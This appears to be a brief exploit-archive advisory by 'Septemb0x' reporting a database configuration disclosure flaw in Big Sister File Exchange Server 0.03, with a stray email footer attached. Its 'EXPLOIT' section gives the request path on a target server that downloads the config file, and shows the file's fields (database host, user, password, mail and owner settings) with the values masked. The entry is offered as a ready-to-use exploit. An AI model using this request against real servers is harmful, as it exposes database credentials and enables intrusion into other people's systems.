Big Sister File Exchange Server version 0.03 suffers from a database configuration disclosure vulnerability.
426f9187c143c614a52d6c4e9875d9dc99cfee623b7fecbc906893a5611b234b
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Big Sister File Exchange Server 0.03
# Vulnerable Type : Arbitrary Db Config Download Vulnerability
# Infection : SQL Info Get...
# Author : Septemb0x
# Script Down.& WebSite : http://sourceforge.net/projects/bigsifes/files/bigsifes/bigsifes-0.03.tgz
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
http://[target]/[path]/config
GET TO;
dbhost=*******
dbuser=*******
dbpassword=*******
db=*******
documentroot=*******
registermail=*******
fileowner=*******
< -- bug code end of -- >
# Greetz : BHDR & BARCOD3
_________________________________________________________________
Sürükle ve Býrak: Windows Live Photos ile fotoðraflarýnýzý kolayca paylaþýmý.
http://www.microsoft.com/turkiye/windows/windowslive/photos.aspx